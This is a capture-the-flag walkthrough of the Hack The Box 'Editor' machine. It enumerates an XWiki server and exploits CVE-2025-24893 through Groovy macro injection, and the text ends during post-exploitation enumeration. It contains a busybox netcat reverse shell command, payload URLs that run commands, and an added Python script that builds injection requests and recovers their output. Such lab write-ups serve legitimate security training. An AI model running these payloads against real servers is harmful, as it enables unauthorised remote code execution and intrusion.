HTB Editor - Linux (Easy)

Enumerate two HTTP services on ports 80 and 8080 to find that one of them is an XWiki instance (Debian package install) vulnerable to CVE-2025-24893, move to a user with a credential found in the XWiki XML config, then PrivEsc with CVE-2024-32019 (Netdata ndsudo).

From HTB:
Starts with enumerating two HTTP services on ports 80 and 8080 to find that one of them is based on XWiki (Debian) and is vulnerable to CVE-2025-24893.
Then elevate internally to a user with a credential found in XML files, then PrivEsc with CVE-2024-32019 (ndsudo).

- Network Enumeration
┌──(kali㉿kali)-[~]
└─$ ping -c2 10.10.11.80
PING 10.10.11.80 (10.10.11.80) 56(84) bytes of data.
64 bytes from 10.10.11.80: icmp_seq=1 ttl=63 time=248 ms
64 bytes from 10.10.11.80: icmp_seq=2 ttl=63 time=247 ms
--- 10.10.11.80 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1070ms
rtt min/avg/max/mdev = 246.916/247.362/247.808/0.446 ms
Awesome, continue with NMAP scanning:
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p- --min-rate 8000 10.10.11.80 -oA nmap/nmapscan
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at
Nmap scan report for 10.10.11.80
Host is up (0.25s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p22,80,8080 -sC -sV -sCV -n 10.10.11.80 -oA nmap/nmapscan
Starting Nmap 7.95 ( https://nmap.org ) at
Nmap scan report for 10.10.11.80
Host is up (0.25s latency).
<details>
<summary>Click to view text output</summary>
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open http Jetty 10.0.20
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|_ Potentially risky methods: PROPFIND LOCK UNLOCK
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
|_http-server-header: Jetty(10.0.20)
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
| http-webdav-scan:
| WebDAV type: Unknown
| Server Type: Jetty(10.0.20)
|_ Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</details>
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds
editor.htb
Two HTTP services, and nginx on port 80 redirects to the vhost editor.htb (add it to /etc/hosts). The more interesting one is 8080, which nmap already identifies as XWiki, so we'll look at it before port 80.
- WebApp Enumeration and Discovery
Port 80.

Might deal with this one later; now let's see the other one on 8080:

It drops us straight into /xwiki/bin/view/Main/, and the page gives away the XWiki version: 15.10.8.


Based on the nmap output the attack surface is wide open (WebDAV methods, fifty robots.txt entries, a known XWiki version), so vulnerability scanning with Nuclei (ProjectDiscovery) should be faster than poking around by hand.
First some directory discovery with feroxbuster, then Nuclei:
<details> <summary>Click to view bash output</summary>┌──(kali㉿kali)-[~]
└─$ sudo feroxbuster -u http://editor.htb:8080/ --filter-status 404
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben “epi” Risher 🤓 ver: 2.13.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://editor.htb:8080/
🚩 In-Scope Url │ editor.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
💢 Status Code Filters │ [404]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
302 GET 0l 0w 0c http://editor.htb:8080/xwiki/bin/commentadd => http://editor.htb:8080/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node01c8ecxvlvtp6xs7ysh7hjuw3d19.node0?srid=Qi8IAuv4&xredirect=%2Fxwiki%2Fbin%2Fcommentadd%3Fsrid%3DQi8IAuv4
302 GET 0l 0w 0c http://editor.htb:8080/xwiki/bin/cancel => http://editor.htb:8080/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node01t2oj5h2waqigs0fv2s71nv6p20.node0?srid=XgplGEtY&xredirect=%2Fxwiki%2Fbin%2Fcancel%3Fsrid%3DXgplGEtY
302 GET 0l 0w 0c http://editor.htb:8080/xwiki/ => http://editor.htb:8080/xwiki/bin/view/Main/
302 GET 0l 0w 0c http://editor.htb:8080/xwiki/bin/propupdate => http://editor.htb:8080/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node0geo8kdqlhuyj1soenh02gjpb022.node0?srid=RTS5IsKO&xredirect=%2Fxwiki%2Fbin%2Fpropupdate%3Fsrid%3DRTS5IsKO
302 GET 0l 0w 0c http://editor.htb:8080/xwiki/bin/deletespace => http://editor.htb:8080/xwiki/bin/login/XWiki/XWikiLogin;jsessionid=node0h7z1bngcmpjd1ctcgfiv4muub23.node0?srid=14aZ2ADh&xredirect=%2Fxwiki%2Fbin%2Fdeletespace%3Fsrid%3D14aZ2ADh
302 GET 0l 0w 0c http://editor.htb:8080/xwiki/bin/propdisable
. . .[SNIP]. . .
</details>
Too much noise: nearly everything under /xwiki/bin/ just redirects to the login page. Nuclei should do better.
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -target http://editor.htb
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
<details>
<summary>Click to view text output</summary>
[WRN] Found 1 templates with syntax error (use -validate flag for further examination)
[INF] Current nuclei version: v3.4.5 (outdated)
[INF] Current nuclei-templates version: v10.3.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 119
[INF] Templates loaded for current scan: 8775
[INF] Executing 79 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 8696 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1868 (Reduced 1739 Requests)
[INF] Using Interactsh Server: oast.live
[waf-detect:nginxgeneric] [http] [info] http://editor.htb
[snmpv3-detect] [javascript] [info] editor.htb:161 [”Enterprise: unknown”]
[ssh-auth-methods] [javascript] [info] editor.htb:22 [”[”publickey”,”password”]”]
[ssh-password-auth] [javascript] [info] editor.htb:22
[ssh-server-enumeration] [javascript] [info] editor.htb:22 [”SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13”]
[ssh-sha1-hmac-algo] [javascript] [info] editor.htb:22
[openssh-detect] [tcp] [info] editor.htb:22 [”SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13”]
[http-missing-security-headers:permissions-policy] [http] [info] http://editor.htb
[http-missing-security-headers:x-content-type-options] [http] [info] http://editor.htb
[http-missing-security-headers:referrer-policy] [http] [info] http://editor.htb
[http-missing-security-headers:clear-site-data] [http] [info] http://editor.htb
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://editor.htb
[http-missing-security-headers:strict-transport-security] [http] [info] http://editor.htb
[http-missing-security-headers:content-security-policy] [http] [info] http://editor.htb
[http-missing-security-headers:x-frame-options] [http] [info] http://editor.htb
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://editor.htb
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://editor.htb
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://editor.htb
[nginx-version] [http] [info] http://editor.htb [”nginx/1.18.0”]
[tech-detect:nginx] [http] [info] http://editor.htb
[caa-fingerprint] [dns] [info] editor.htb
[INF] Scan completed in 3m. 21 matches found.
</details>
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -target http://editor.htb:8080/
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
<details>
<summary>Click to view text output</summary>
[WRN] Found 1 templates with syntax error (use -validate flag for further examination)
[INF] Current nuclei version: v3.4.5 (outdated)
[INF] Current nuclei-templates version: v10.3.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 119
[INF] Templates loaded for current scan: 8775
[INF] Executing 79 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 8696 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1868 (Reduced 1739 Requests)
[INF] Using Interactsh Server: oast.site
[CVE-2025-32430] [http] [medium] http://editor.htb:8080/xwiki/bin/view/Main/?xpage=job_status_json&jobId=asdf&translationPrefix=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
[CVE-2025-29925] [http] [high] http://editor.htb:8080/xwiki/rest/wikis/xwiki/pages?space [path=”xwiki/rest/wikis/xwiki/pages?space=”]
[internal-ip-disclosure] [http] [info] http://editor.htb:8080/ [”10.10.11.80”]
[webdav-enabled] [http] [info] http://editor.htb:8080/
[snmpv3-detect] [javascript] [info] editor.htb:161 [”Enterprise: unknown”]
[ssh-password-auth] [javascript] [info] editor.htb:22
[ssh-sha1-hmac-algo] [javascript] [info] editor.htb:22
[ssh-auth-methods] [javascript] [info] editor.htb:22 [”[”publickey”,”password”]”]
[ssh-server-enumeration] [javascript] [info] editor.htb:22 [”SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13”]
[openssh-detect] [tcp] [info] editor.htb:22 [”SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13”]
[options-method] [http] [info] http://editor.htb:8080/ [”OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK”]
[http-missing-security-headers:strict-transport-security] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:content-security-policy] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:permissions-policy] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:x-content-type-options] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:clear-site-data] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:x-frame-options] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:referrer-policy] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/
[robots-txt] [http] [info] http://editor.htb:8080/robots.txt
[xwiki-detect] [http] [info] http://editor.htb:8080/xwiki/bin/view/Main/ [”WebHome”]
[CVE-2025-32970] [http] [medium] http://editor.htb:8080/xwiki/bin/view/Main/?foo=bar&foo_syntax=invalid&RequiresHTMLConversion=foo&xerror=https://oast.me
[CVE-2023-35162] [http] [medium] http://editor.htb:8080/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain)
[CVE-2024-45591] [http] [medium] http://editor.htb:8080/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history
[CVE-2025-24893] [http] [critical] http://editor.htb:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20
[tech-detect:jetty] [http] [info] http://editor.htb:8080/xwiki/
[robots-txt-endpoint:endpoints] [http] [info] http://editor.htb:8080/robots.txt [”/xwiki/bin/admin/”,”/xwiki/bin/jcaptcha/”,”/xwiki/bin/inline/”,”/xwiki/bin/preview/”,”/xwiki/bin/save/”,”/xwiki/bin/rollback/”,”/xwiki/bin/reset/”,”/xwiki/bin/deletespace/”,”/xwiki/bin/register/”,”/xwiki/bin/downloadrev/”,”/xwiki/bin/loginsubmit/”,”/xwiki/bin/logout/”,”/xwiki/bin/import/”,”/xwiki/bin/unknown/”,”/xwiki/bin/webjars/”,”/xwiki/bin/viewrev/”,”/xwiki/bin/objectadd/”,”/xwiki/bin/redirect/”,”/xwiki/bin/edit/”,”/xwiki/bin/propdelete/”,”/xwiki/bin/objectremove/”,”/xwiki/bin/get/”,”/xwiki/bin/distribution/”,”/xwiki/bin/deleteversions/”,”/xwiki/bin/propdisable/”,”/xwiki/bin/dot/”,”/xwiki/bin/delattachment/”,”/xwiki/bin/login/”,”/xwiki/bin/export/”,”/xwiki/bin/viewattachrev/”,”/xwiki/bin/create/”,”/xwiki/bin/undelete/”,”/xwiki/bin/upload/”,”/xwiki/bin/temp/”,”/xwiki/bin/skin/”,”/xwiki/bin/jsx/”,”/xwiki/bin/saveandcontinue/”,”/xwiki/bin/propadd/”,”/xwiki/bin/commentsave/”,”/xwiki/bin/objectsync/”,”/xwiki/bin/attach/”,”/xwiki/bin/ssx/”,”/xwiki/bin/loginerror/”,”/xwiki/bin/lock/”,”/xwiki/bin/pdf/”,”/xwiki/bin/cancel/”,”/xwiki/bin/delete/”,”/xwiki/bin/propupdate/”,”/xwiki/bin/propenable/”,”/xwiki/bin/commentadd/”]
[tech-detect:jetty] [http] [info] http://editor.htb:8080/xwiki
[tech-detect:jetty] [http] [info] http://editor.htb:8080/
[caa-fingerprint] [dns] [info] editor.htb
[INF] Scan completed in 4m. 33 matches found.
</details>
Great, Nuclei found five or more CVEs on the 8080 webapp, one of them critical: CVE-2025-24893.

The other hits (several XSS findings among them) would be worth reporting in a bug bounty context, but they are not what gets us a shell.

Let's follow the critical one. The template's payload is a `{{groovy}}` macro running `cat /etc/passwd`, so this is remote code execution.
- CVE-2025-24893 for Initial Access

Great, we have an unauthenticated RCE candidate, and XWiki 15.10.8 is below the fixed versions (15.10.11 / 16.4.1). Let's be a script kiddie and grab a public script for this CVE:

I used this one:

Usage:
python3 CVE-2025-24893.py -t 'http://example.com:8080' -c 'busybox nc 10.10.10.10 9001 -e /bin/bash'
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-24893.py -t http://editor.htb:8080/ -c 'busybox nc 10.10.14.115 9001 -e /bin/bash'
[*] Attacking http://editor.htb:8080/
[*] Injecting the payload:
http://editor.htb:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2010.10.14.115%209001%20-e%20/bin/bash%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D
[*] Command executed
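To make clear what that script is actually sending, here is an added example (my own code, not the PoC used above and nothing from XWiki) that builds the same SolrSearch request from its pieces, offers a harmless arithmetic check modelled on the vendor advisory's to confirm the bug before running any command, and pulls command output back out of the RSS response. The endpoint, parameters and macro chain are the ones visible in the nuclei and script output above; the `__EDITOR_OUT__` marker, the `/bin/sh -c` wrapper and the version-comparison helper are my assumptions.

```python
"""Added example: anatomy of the CVE-2025-24893 SolrSearch injection.

Not the page's PoC script. Endpoint, parameters and macro chain are taken
from the request shown above; marker string and sh -c wrapper are mine.
"""
import html
import json
import re
from typing import Optional
from urllib.parse import parse_qs, quote, urlencode, urljoin, urlparse

# Unauthenticated endpoint. With media=rss the `text` parameter is rendered
# as wiki syntax instead of being treated as data.
SOLR_PATH = "/xwiki/bin/get/Main/SolrSearch"
FIXED = ((15, 10, 11), (16, 4, 1))  # fix versions on the 15.x and 16.x branches
MARK = "__EDITOR_OUT__"             # assumption: fence around command output


def is_vulnerable_version(version: str) -> bool:
    """True when `version` predates the fix on its branch (RC suffixes ignored)."""
    v = tuple(int(x) for x in re.findall(r"\d+", version)[:3])
    if v[0] <= 15:
        return v < FIXED[0]
    if v[0] == 16:
        return v < FIXED[1]
    return False


def wiki_injection(groovy_body: str) -> str:
    """Wrap Groovy in the macro chain used by the public payload.

    `}}}` closes the verbatim block the search page wraps the query in,
    `{{async async=false}}` renders synchronously so output lands in the
    response, and `{{groovy}}` runs the script server-side.
    """
    return "}}}{{async async=false}}{{groovy}}" + groovy_body + "{{/groovy}}{{/async}}"


def build_url(base: str, text: str) -> str:
    # quote_via=quote gives %20 rather than '+', matching the page's request.
    return urljoin(base, SOLR_PATH) + "?" + urlencode(
        {"media": "rss", "text": text}, quote_via=quote)


def check_url(base: str) -> str:
    """Harmless check: arithmetic only, no command execution."""
    return build_url(base, wiki_injection(f'print("{MARK}" + (23 + 19) + "{MARK}")'))


def command_url(base: str, command: str) -> str:
    """Run `command` via /bin/sh -c and fence its stdout with MARK.

    A Groovy list `.execute()` passes argv untouched, so quotes and pipes in
    `command` survive; `"cmd".execute()` (the script above) splits on whitespace.
    """
    literal = json.dumps(command).replace("$", "\\$")  # valid Groovy string literal
    body = (f'print("{MARK}");'
            f'print(["/bin/sh","-c",{literal}].execute().text);'
            f'print("{MARK}")')
    return build_url(base, wiki_injection(body))


def text_param(url: str) -> str:
    """Decode the `text` parameter back out of a built URL (for inspection)."""
    return parse_qs(urlparse(url).query)["text"][0]


def extract_output(rss_body: str) -> Optional[str]:
    """Recover fenced output from the RSS response; the feed HTML-escapes it."""
    m = re.search(re.escape(MARK) + r"(.*?)" + re.escape(MARK), rss_body, re.S)
    return html.unescape(m.group(1)) if m else None


def is_exploitable(check_response: str) -> bool:
    """Did the harmless check evaluate? A fenced 42 only appears if Groovy ran."""
    return extract_output(check_response) == "42"
```

Run `check_url()` against the target first: if the RSS body carries the fenced `42`, the `text` parameter is being rendered as wiki syntax and the box is exploitable; only then move on to `command_url()`. Fencing the output with a marker is what makes the result machine-readable instead of eyeballing it inside the feed XML.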
Our listener:
<details> <summary>Click to view bash output</summary>┌──(kali㉿kali)-[~]
└─$ sudo rlwrap -cAr nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.115] from (UNKNOWN) [10.10.11.80] 59866
id
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
which python3
/usr/bin/python3
python3 -c 'import pty; pty.spawn("/bin/bash")'
xwiki@editor:/usr/lib/xwiki-jetty$
zsh: suspended sudo rlwrap -cAr nc -lvnp 9001
┌──(kali㉿kali)-[~]
└─$ stty raw -echo; fg
[1] + continued sudo rlwrap -cAr nc -lvnp 9001
xwiki@editor:/usr/lib/xwiki-jetty$
</details>
xwiki@editor:/usr/lib/xwiki-jetty$ id
id
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
xwiki@editor:/usr/lib/xwiki-jetty$ pwd
pwd
/usr/lib/xwiki-jetty
xwiki@editor:/usr/lib/xwiki-jetty$
I upgraded the TTY with python as shown above; if you want a nicer experience you can use penelope for the shell, but I like my old style.
<details> <summary>Click to view text output</summary>xwiki@editor:/usr/lib/xwiki-jetty$ export TERM=xterm
export TERM=xterm
xwiki@editor:/usr/lib/xwiki-jetty$ ls -al
ls -al
total 72
drwxr-xr-x 5 root root 4096 Jul 29 11:48 .
drwxr-xr-x 91 root root 4096 Jul 29 11:55 ..
drwxr-xr-x 6 root root 4096 Jul 29 11:48 jetty
lrwxrwxrwx 1 root root 14 Mar 27 2024 logs -> /var/log/xwiki
drwxr-xr-x 2 root root 4096 Jul 29 11:48 start.d
-rw-r--r-- 1 root root 5551 Mar 27 2024 start_xwiki.bat
-rw-r--r-- 1 root root 6223 Mar 27 2024 start_xwiki_debug.bat
-rw-r--r-- 1 root root 10530 Mar 27 2024 start_xwiki_debug.sh
-rw-r--r-- 1 root root 9340 Mar 27 2024 start_xwiki.sh
-rw-r--r-- 1 root root 2486 Mar 27 2024 stop_xwiki.bat
-rw-r--r-- 1 root root 6749 Mar 27 2024 stop_xwiki.sh
drwxr-xr-x 3 root root 4096 Jun 13 17:08 webapps
xwiki@editor:/usr/lib/xwiki-jetty$
</details>
Let’s do internal enumeration.
- PrivEsc to User
xwiki@editor:/home$ ls -al
ls -al
total 12
drwxr-xr-x 3 root root 4096 Jul 8 08:34 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
drwxr-x--- 4 oliver oliver 4096 Nov 8 00:57 oliver
xwiki@editor:/home$
So oliver is the only local user. Now let's hunt for credentials, starting from the webapp side:
<details> <summary>Click to view text output</summary>xwiki@editor:/var$ ls -al
ls -al
total 52
drwxr-xr-x 13 root root 4096 Jul 29 11:55 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
drwxr-xr-x 2 root root 4096 Nov 8 00:00 backups
drwxr-xr-x 15 root root 4096 Jul 29 11:55 cache
drwxrwxrwt 2 root root 4096 Nov 8 06:25 crash
drwxr-xr-x 50 root root 4096 Jul 29 11:55 lib
drwxrwsr-x 2 root staff 4096 Apr 18 2022 local
lrwxrwxrwx 1 root root 9 Feb 17 2023 lock -> /run/lock
drwxrwxr-x 15 root syslog 4096 Nov 8 00:00 log
drwxrwsr-x 2 root mail 4096 Feb 17 2023 mail
drwxr-xr-x 2 root root 4096 Feb 17 2023 opt
lrwxrwxrwx 1 root root 4 Feb 17 2023 run -> /run
drwxr-xr-x 4 root root 4096 Feb 17 2023 spool
drwxrwxrwt 2 root root 4096 Nov 7 20:14 tmp
drwxr-xr-x 3 root root 4096 Jun 15 04:59 www
xwiki@editor:/var$ tree .
tree .
Command ‘tree’ not found, but can be installed with:
apt install tree
Please ask your administrator.
xwiki@editor:/var$
</details>
But searching manually takes time:
<details> <summary>Click to view text output</summary>xwiki@editor:/var/backups$ ls -al
ls -al
total 824
drwxr-xr-x 2 root root 4096 Nov 8 00:00 .
drwxr-xr-x 13 root root 4096 Jul 29 11:55 ..
-rw-r--r-- 1 root root 51200 Nov 8 00:00 alternatives.tar.0
-rw-r--r-- 1 root root 37945 Jul 29 11:54 apt.extended_states.0
-rw-r--r-- 1 root root 4194 Jul 29 11:33 apt.extended_states.1.gz
-rw-r--r-- 1 root root 4172 Jul 2 10:15 apt.extended_states.2.gz
-rw-r--r-- 1 root root 4103 Jun 15 04:59 apt.extended_states.3.gz
-rw-r--r-- 1 root root 3550 Jun 13 09:59 apt.extended_states.4.gz
-rw-r--r-- 1 root root 0 Nov 8 00:00 dpkg.arch.0
-rw-r--r-- 1 root root 268 Apr 27 2023 dpkg.diversions.0
-rw-r--r-- 1 root root 100 Feb 17 2023 dpkg.statoverride.0
-rw-r--r-- 1 root root 703493 Jul 29 11:55 dpkg.status.0
xwiki@editor:/var/backups$ cd ..
cd ..
xwiki@editor:/var$ cd www
cd www
xwiki@editor:/var/www$ ls -al
ls -al
total 12
drwxr-xr-x 3 root root 4096 Jun 15 04:59 .
drwxr-xr-x 13 root root 4096 Jul 29 11:55 ..
drwxr-xr-x 3 root root 4096 Jun 15 06:18 html
xwiki@editor:/var/www$ cd html
cd html
xwiki@editor:/var/www/html$ ls
ls
assets index.html
xwiki@editor:/var/www/html$ cd assets
cd assets
xwiki@editor:/var/www/html/assets$ ls -al
ls -al
total 21984
drwxr-xr-x 2 root root 4096 Jun 17 09:10 .
drwxr-xr-x 3 root root 4096 Jun 15 06:18 ..
-rw-r--r-- 1 root root 16052 Jun 15 06:20 index-DzxC4GL5.css
-rw-r--r-- 1 root root 190349 Jun 17 09:10 index-VRKEJlit.js
-rw-r--r-- 1 root root 11932476 Jun 16 09:42 simplistcode_1.0.deb
-rw-r--r-- 1 root root 10354968 Jun 17 09:08 simplistcode_1.0.exe
xwiki@editor:/var/www/html/assets$ cat /etc/hosts
cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 editor editor.htb wiki.editor.htb
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
xwiki@editor:/var/www/html/assets$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:ing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mysql:x:115:121:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat:/usr/sbin/nologin
xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
netdata:x:996:999:netdata:/opt/netdata:/usr/sbin/nologin
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
_laurel:x:995:995::/var/log/laurel:/bin/false
xwiki@editor:/var/www/html/assets$ ss -tunlp
ss -tunlp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
udp UNCONN 0 0 127.0.0.1:8125 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:8125 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:19999 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:43093 0.0.0.0:*
tcp LISTEN 0 511 [::]:80 [::]:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 50 [::ffff:127.0.0.1]:8079 *:* users:((”java”,pid=1047,fd=41))
tcp LISTEN 0 50 *:8080 *:* users:((”java”,pid=1047,fd=43))
xwiki@editor:/var/www/html/assets$
</details>
Two listeners worth noting before going further: MySQL on 127.0.0.1:3306 (plus the X protocol on 33060), and 127.0.0.1:19999, Netdata's default port (the netdata account in /etc/passwd confirms it is installed); both are bound to localhost only. Let's fire LinPEAS.
<details> <summary>Click to view text output</summary>xwiki@editor:/var/www/html/assets$ cd /tmp
cd /tmp
xwiki@editor:/tmp$ ls -al
ls -al
total 24
drwxrwxrwt 6 root root 4096 Nov 8 11:31 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
drwxr-xr-x 2 xwiki xwiki 4096 Nov 7 20:14 hsperfdata_xwiki
